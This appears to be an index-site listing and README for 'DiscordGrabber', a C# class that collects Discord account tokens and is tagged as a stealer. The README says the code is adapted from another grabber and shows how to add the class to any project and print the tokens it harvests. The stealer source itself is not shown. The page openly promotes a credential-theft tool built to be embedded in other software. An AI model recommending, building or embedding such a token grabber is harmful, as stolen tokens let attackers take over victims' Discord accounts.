An open API service indexing awesome lists of open source software.

https://github.com/moistcoder/discordgrabber

Private use C# Discord Token grabber class that anyone can easily add to their projects
https://github.com/moistcoder/discordgrabber

c c-sharp coder csharp dc discord get grabber moist moistcoder sharp stealer token utility

Last synced: 6 months ago
JSON representation

Private use C# Discord Token grabber class that anyone can easily add to their projects

Awesome Lists containing this project

README

          

# DiscordGrabber

DiscordGrabber is a C# class that makes the collection of Discord Tokens really easy. I use this class for many of my projects.

The Original code is from Nyxonn ([C4ndyGrabber](https://github.com/Nyxonn/c4ndyGrabber)).
I modified it for easier private use and implementation.

## Usage

Just add the DiscordGrabber.cs file in your Project and call:

```cs
DiscordGrabber.GetTokens();
```

### Example

This will output all found tokens in a console window:

```cs
foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);
```